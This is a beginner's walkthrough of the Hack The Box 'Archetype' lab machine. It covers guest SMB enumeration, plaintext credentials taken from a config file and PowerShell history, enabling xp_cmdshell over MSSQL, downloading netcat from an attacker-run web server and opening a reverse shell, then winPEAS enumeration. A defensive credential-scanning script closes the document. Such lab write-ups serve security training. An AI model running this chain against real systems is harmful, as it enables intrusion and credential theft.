The aim of this walkthrough is to provide help with the Archetype machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 2 challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $ echo $rhost 
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

We could use the unset command to remove it after we no longer need it.

┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $unset rhost 
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

TASK 1

Question: Which TCP port is hosting a database server?

We start our recon with a quick connection check.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ ping $rhost -c 4
PING 10.129.63.163 (10.129.63.163) 56(84) bytes of data.
64 bytes from 10.129.63.163: icmp_seq=1 ttl=127 time=12.0 ms
64 bytes from 10.129.63.163: icmp_seq=2 ttl=127 time=11.4 ms
64 bytes from 10.129.63.163: icmp_seq=3 ttl=127 time=11.7 ms
64 bytes from 10.129.63.163: icmp_seq=4 ttl=127 time=11.4 ms

--- 10.129.63.163 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 11.352/11.636/12.018/0.265 ms
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$

Then we follow up with a scan of the top 1000 TCP ports (version and script scan).

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ nmap -sC -sV $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-11 14:33 BST
Nmap scan report for 10.129.63.163
Host is up (0.057s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2023-05-11T13:33:22+00:00; +1s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-05-11T13:25:34
|_Not valid after:  2053-05-11T13:25:34
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h45m01s, deviation: 3h30m00s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-05-11T06:33:14-07:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-05-11T13:33:16
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

Four ports are reported to be open on our target. Additionally, there are some other interesting pieces of information to take note of:

  • OS: Microsoft Windows
  • SQL Server running on TCP port 1433
  • guest login is enabled for port 445 (SMB)

Let us capitalize on this information.

1433

TASK 2

Question: What is the name of the non-Administrative share available over SMB?

Using the guest username (guest access) and listing the shares available over SMB will direct us toward the backups share.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ smbclient -U guest -L $rhost
Password for [WORKGROUP\guest]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

backups

TASK 3

Question: What is the password identified in the file on the SMB share?

Accessing the share and listing its contents brings us to the - prod.dtsConfig - file.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ smbclient -U guest \\\\$rhost\\backups
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 12:20:57 2020
  ..                                  D        0  Mon Jan 20 12:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 12:23:02 2020

		5056511 blocks of size 4096. 2531250 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (12.1 KiloBytes/sec) (average 12.1 KiloBytes/sec)
smb: \> exit

After the download is finished, opening it on our local machine will bring us a nice surprise.

┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$ cat prod.dtsConfig 
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
┌─[eu-starting-point-vip-1-dhcp]─[10.10.14.46]─[htb-bluewalle@htb-9swjmh1jnx]─[~/archetype]
└──╼ [★]$

Even though it looks like some configuration file, there are some potential credentials hidden there.

potential credentials
host        ARCHETYPE
username    sql_svc
password    M3g4c0rp123

But since proper recon is always the key, we make sure to check out the other shares too, even if they do not look that interesting at first sight.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ smbclient -U guest \\\\$rhost\\ADMIN$
Password for [WORKGROUP\guest]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ smbclient -U guest \\\\$rhost\\IPC$
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

We were right, nothing interesting there. But still, it never hurts to check.

M3g4c0rp123

TASK 4

Question: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

Once we have Impacket installed, using the tab-autocomplete feature can help us out.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-
impacket-addcomputer        impacket-lookupsid          impacket-rpcmap
impacket-atexec             impacket-mimikatz           impacket-sambaPipe
impacket-dcomexec           impacket-mqtt_check         impacket-samrdump
impacket-dpapi              impacket-mssqlclient        impacket-secretsdump
impacket-esentutl           impacket-mssqlinstance      impacket-services
impacket-exchanger          impacket-netview            impacket-smbclient
impacket-findDelegation     impacket-nmapAnswerMachine  impacket-smbexec
impacket-GetADUsers         impacket-ntfs-read          impacket-smbrelayx
impacket-getArch            impacket-ntlmrelayx         impacket-smbserver
impacket-GetNPUsers         impacket-ping               impacket-sniff
impacket-getPac             impacket-ping6              impacket-sniffer
impacket-getST              impacket-psexec             impacket-split
impacket-getTGT             impacket-raiseChild         impacket-ticketConverter
impacket-GetUserSPNs        impacket-rdp_check          impacket-ticketer
impacket-goldenPac          impacket-reg                impacket-wmiexec
impacket-karmaSMB           impacket-registry-read      impacket-wmipersist
impacket-kintercept         impacket-rpcdump            impacket-wmiquery
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-

Therefore, it will come down to these noteworthy fellows:

  • impacket-mssqlclient
  • impacket-mssqlinstance

Checking them both out should make our choice quite easy.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-mssqlclient --help
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

usage: mssqlclient.py [-h] [-port PORT] [-db DB] [-windows-auth] [-debug] [-file FILE]
                      [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                      [-dc-ip ip address]
                      target

TDS client implementation (SSL supported).

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

optional arguments:
  -h, --help            show this help message and exit
  -port PORT            target MSSQL port (default 1433)
  -db DB                MSSQL database instance (default None)
  -windows-auth         whether or not to use Windows Authentication (default False)
  -debug                Turn DEBUG output ON
  -file FILE            input file with commands to execute in the SQL shell

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file
                        (KRB5CCNAME) based on target parameters. If valid credentials cannot
                        be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain
                        part (FQDN) specified in the target parameter
                       
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$impacket-mssqlinstance --help
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

usage: mssqlinstance.py [-h] [-timeout TIMEOUT] host

Asks the remote host for its running MSSQL Instances.

positional arguments:
  host              target host

optional arguments:
  -h, --help        show this help message and exit
  -timeout TIMEOUT  timeout to wait for an answer
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

Since we already have the credentials, let’s try and connect to it. It is important to note that without the -windows-auth optional argument our connection will not work, because sql_svc is a Windows account (ARCHETYPE\sql_svc) rather than a SQL Server login.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ impacket-mssqlclient ARCHETYPE/sql_svc:M3g4c0rp123@$rhost -windows-auth
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> 

mssqlclient.py

TASK 5

Question: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

Using the built-in help command in our authenticated sql session should shine a light on our answer.

SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL>

Trying to get some more information about what the xp_cmdshell command exactly does is a bust, but it does provide us with some further hints.

SQL> xp_cmdshell help
[-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL>

Breaking it down, it looks like it tried to run help directly as a command, but it was stopped because the feature is not yet turned on. Enabling it sounds like a good idea, so let’s try it.

SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL>

Great, it looks like it actually worked and we could turn it on. Let’s try and run whoami and see if it runs.

SQL> xp_cmdshell whoami
output              
-----------------   
archetype\sql_svc   

NULL                

SQL>

Wow, it worked. But where are we exactly?

SQL> xp_cmdshell echo %cd%
output                
-------------------   
C:\Windows\system32   

NULL                  

SQL> 

What else can we run? Can we just grab the user flag from here directly?

SQL> xp_cmdshell "powershell cat C:\Users\sql_svc\Desktop\user.txt"
output                             
--------------------------------   
<flag>   

NULL                               

SQL>

Actually, we can and we just did. But communicating with our target this way (via the interactive sql shell) is quite cumbersome. So our next course of action should be to get a reverse shell on the target.

In a nutshell, it could look something like this:

  1. making the netcat binary available on lhost (local machine)
  2. using the interactive SQL terminal to download this binary to the target machine
  3. creating a netcat listener on lhost
  4. running the netcat binary on the target via the interactive SQL shell to connect back to lhost

So let’s start with #1: our first action is to download the Windows netcat binary (nc64.exe) and store it on our local machine.

Running Python’s built-in http.server module from that same directory starts a local web server and makes all the files in that directory accessible.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ ll
total 48K
-rw-r--r-- 1 htb-bluewalle htb-bluewalle 45K May 11 16:20 nc64.exe
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...

Continuing with #2: we go back to our interactive SQL shell. Then we try downloading the binary using PowerShell and wget (an alias for Invoke-WebRequest in Windows PowerShell).

Our first attempt is to download the file (from our current directory) and then save it to - C:\Users\sql_svc\Downloads - (where we have write access), but we get an error…

SQL> xp_cmdshell "powershell -c wget http://10.10.14.46:4444/nc64.exe -outfile C:\Users\sql_svc\Downloads"
output                                                                             
--------------------------------------------------------------------------------   
wget : Access to the path 'C:\Users\sql_svc\Downloads' is denied.                  

At line:1 char:1                                                                   

+ wget http://10.10.14.46:4444/nc64.exe -outfile C:\Users\sql_svc\Downl ...        

+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~            

    + CategoryInfo          : NotSpecified: (:) [Invoke-WebRequest], UnauthorizedAccessException   

    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand   

                                                                                   

NULL                                                                               

SQL>

In our second attempt, we first head to - C:\Users\sql_svc\Downloads - and only after changing directory do we try to download the binary. Note that -outfile expects a file name rather than a bare directory, which is why the first attempt was rejected with an access error.

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.46:4444/nc64.exe -outfile nc64.exe"
output   
------   
NULL     

SQL>

This time we are successful and our binary is located at - C:\Users\sql_svc\Downloads\nc64.exe -.

SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
output                                                                             
--------------------------------------------------------------------------------   
NULL                                                                               

NULL                                                                               

    Directory: C:\Users\sql_svc\Downloads                                          

NULL                                                                               

NULL                                                                               

Mode                LastWriteTime         Length Name                                                                     

----                -------------         ------ ----                                                                     

-a----        5/11/2023   8:57 AM          45272 nc64.exe                                                                 

NULL                                                                               

NULL                                                                               

NULL                                                                               

SQL>

We shut down the http server right after the download has finished.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.129.63.163 - - [11/May/2023 16:56:39] "GET /nc64.exe HTTP/1.1" 200 -
10.129.63.163 - - [11/May/2023 16:57:33] "GET /nc64.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ 

Now for #3: It’s time to start our listener.

# on lhost
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Finally (#4): We try to run the netcat binary on the target and instruct it to connect back to our local machine.

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.46 4444"

No output here. Did it work…? Once we head over to the listener from #3, we will see that we got a reverse shell back. So it actually worked.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.63.163.
Ncat: Connection from 10.129.63.163:49680.
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads>

Let’s use our new (and much better) connection to grab the user flag (again).

C:\Users\sql_svc\Downloads>whoami
whoami
archetype\sql_svc

C:\Users\sql_svc\Downloads>cd ..\Desktop\
cd ..\Desktop\

C:\Users\sql_svc\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9565-0B4F

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,711,236,608 bytes free

C:\Users\sql_svc\Desktop>type user.txt
type user.txt
<flag>
C:\Users\sql_svc\Desktop>

xp_cmdshell

TASK 6

Question: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

One of the most commonly used scripts for privilege escalation on Windows is winPEAS.

Let’s bring it over to our target. We go through the same motions as before:

  • python http server in the directory where the file is located - lhost
  • use powershell and wget to copy it over - rhost

Since winPEAS is already present on the pwnbox, locating it seems like the only thing still left for us to do. It might take some time, but it can be found at

/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe

Then, we copy it over to our working directory.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ []$ cp winPEASx64.exe ~/archetype/
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ []$

Once copied, we head back to our working directory and start our http server.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][/opt/useful/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release]
└──╼ []$ cd ~/archetype/
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...

Then we use our reverse shell to download it to rhost.

C:\Users\sql_svc\Downloads>powershell -c wget http://10.10.14.46:4444/winPEASx64.exe -outfile winPEASx64.exe
powershell -c wget http://10.10.14.46:4444/winPEASx64.exe -outfile winPEASx64.exe

C:\Users\sql_svc\Downloads>

Once downloaded, we close up the http server.

┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$ python -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
10.129.63.163 - - [11/May/2023 18:06:33] "GET /winPEASx64.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌─[eu-starting-point-vip-1-dhcp][10.10.14.46][htb-bluewalle@htb-9swjmh1jnx][~/archetype]
└──╼ []$

All that’s left for us is to run it.

C:\Users\sql_svc\Downloads>powershell -c .\winPEASx64.exe
powershell -c .\winPEASx64.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

  WinPEASng by @carlospolopm, makikvues(makikvues2[at]gmail[dot]com)

       /---------------------------------------------------------------------------\
       |                             Do you like PEASS?                            |
       |---------------------------------------------------------------------------| 
       |         Become a Patreon    :     https://www.patreon.com/peass           |
       |         Follow on Twitter   :     @carlospolopm                           |
       |         Respect on HTB      :     SirBroccoli & makikvues                 |
       |---------------------------------------------------------------------------|
       |                                 Thank you!                                |
       \---------------------------------------------------------------------------/

  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

╚ You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
   Creating Dynamic lists, this could take a while, please wait...
   - Loading YAML definitions file...
   - Checking if domain...
   - Getting Win32_UserAccount info...
   - Creating current user groups list...
   - Creating active users list (local only)...
   - Creating disabled users list...
   - Admin users list...
   - Creating AppLocker bypass list...
   - Creating files/directories list for search...


═══════════════════════════════════╣ System Information ═══════════════════════════════════

══════════╣ Basic System Information
╚ Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
    Hostname: Archetype
    ProductName: Windows Server 2019 Standard
    EditionID: ServerStandard
    ReleaseId: 1809
    BuildBranch: rs5_release
    CurrentMajorVersionNumber: 10
    CurrentVersion: 6.3
    Architecture: AMD64
    ProcessorCount: 2
    SystemLang: en-US
    KeyboardLang: English (United States)
    TimeZone: (UTC-08:00) Pacific Time (US & Canada)
    IsVirtualMachine: True
    Current Time: 5/11/2023 10:08:59 AM
    HighIntegrity: False
    PartOfDomain: False
    Hotfixes: KB5004335, KB5003711, KB5004244, 

  [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
 [*] OS Version: 1809 (17763)
 [*] Enumerating installed KBs...
 [!] CVE-2019-0836 : VULNERABLE
  [>] https://exploit-db.com/exploits/46718
  [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

 [!] CVE-2019-0841 : VULNERABLE
  [>] https://github.com/rogue-kdc/CVE-2019-0841
  [>] https://rastamouse.me/tags/cve-2019-0841/

 [!] CVE-2019-1064 : VULNERABLE
  [>] https://www.rythmstick.net/posts/cve-2019-1064/

 [!] CVE-2019-1130 : VULNERABLE
  [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

 [!] CVE-2019-1253 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2019-1253
  [>] https://github.com/sgabe/CVE-2019-1253

 [!] CVE-2019-1315 : VULNERABLE
  [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

 [!] CVE-2019-1388 : VULNERABLE
  [>] https://github.com/jas502n/CVE-2019-1388

 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk

 [!] CVE-2020-0668 : VULNERABLE
  [>] https://github.com/itm4n/SysTracingPoc

 [!] CVE-2020-0683 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2020-0683
  [>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1

 [!] CVE-2020-1013 : VULNERABLE
  [>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

 [*] Finished. Found 12 potential vulnerabilities.

...
...
...

══════════╣ Analyzing Windows Files Files (limit 70)
    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    C:\Users\Default\NTUSER.DAT
    C:\Users\sql_svc\NTUSER.DAT

══════════╣ Analyzing Other Windows Files Files (limit 70)



C:\Users\sql_svc\Downloads>

winpeas

TASK 7

Question: What file contains the administrator’s password?

The output from winPEAS is quite lengthy (only a snippet is shown in TASK 6), but one of the last lines mentioned the location of the PowerShell history file.

...
══════════╣ Analyzing Windows Files Files (limit 70)
    C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
...

Checking it will lead us to some administrator credentials.

C:\Users\sql_svc\Downloads>type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

C:\Users\sql_svc\Downloads>
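As an added example (not part of the original walkthrough), the following Python script shows how a defender could scan for the two kinds of plaintext credential exposure this box relies on: the connection string inside the DTS configuration file from TASK 3 and the net use command stored in the PSReadLine history from TASK 7. The sample inputs are constructed to mirror those files, and all function names are my own.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the prod.dtsConfig found on the backups share (TASK 3).
DTSCONFIG_SAMPLE = """<DTSConfiguration>
    <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
"""

# Constructed sample mirroring the ConsoleHost_history.txt read in TASK 7.
HISTORY_SAMPLE = """cd C:\\Users\\sql_svc
net.exe use T: \\\\Archetype\\backups /user:administrator MEGACORP_4dm1n!!
exit
"""

# Connection-string keys that carry a secret or a user name (OLE DB / SQLNCLI naming).
SECRET_KEYS = ("password", "pwd")
USER_KEYS = ("user id", "uid")

# 'net use <drive> <share> /user:<name> <password>' as it appears in a command history.
NET_USE_RE = re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(\S+)\s+(\S+)", re.IGNORECASE)


def parse_connection_string(value):
    """Split a 'Key=Value;Key=Value' string into a dict with lower-cased keys."""
    pairs = {}
    for part in value.split(";"):
        key, sep, val = part.partition("=")
        if sep:  # skip empty trailing parts and fragments without '='
            pairs[key.strip().lower()] = val.strip()
    return pairs


def find_dtsconfig_credentials(xml_text):
    """Return (property path, user, password) for each ConfiguredValue holding a password."""
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        pairs = parse_connection_string(value_el.text)
        secret = next((pairs[k] for k in SECRET_KEYS if k in pairs), None)
        if secret is None:
            continue
        user = next((pairs[k] for k in USER_KEYS if k in pairs), "")
        findings.append((conf.get("Path", ""), user, secret))
    return findings


def find_history_credentials(history_text):
    """Return (line number, user, password) for 'net use ... /user:NAME PASSWORD' lines."""
    findings = []
    for line_no, line in enumerate(history_text.splitlines(), start=1):
        match = NET_USE_RE.search(line)
        if match:
            findings.append((line_no, match.group(1), match.group(2)))
    return findings


def redact(secret):
    """Mask a secret for reporting, keeping only its length."""
    return "*" * len(secret)


def report(dts_findings, history_findings):
    """Build report lines with passwords masked, so the report itself leaks nothing."""
    lines = []
    for path, user, secret in dts_findings:
        lines.append(f"[dtsconfig] {path}: user={user} password={redact(secret)}")
    for line_no, user, secret in history_findings:
        lines.append(f"[history] line {line_no}: user={user} password={redact(secret)}")
    return lines


if __name__ == "__main__":
    for line in report(find_dtsconfig_credentials(DTSCONFIG_SAMPLE),
                       find_history_credentials(HISTORY_SAMPLE)):
        print(line)
```

Pointed at real share contents and user profiles instead of the embedded samples, the same two functions give a quick inventory of where service and administrator passwords are sitting in cleartext.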

ConsoleHost_history.txt

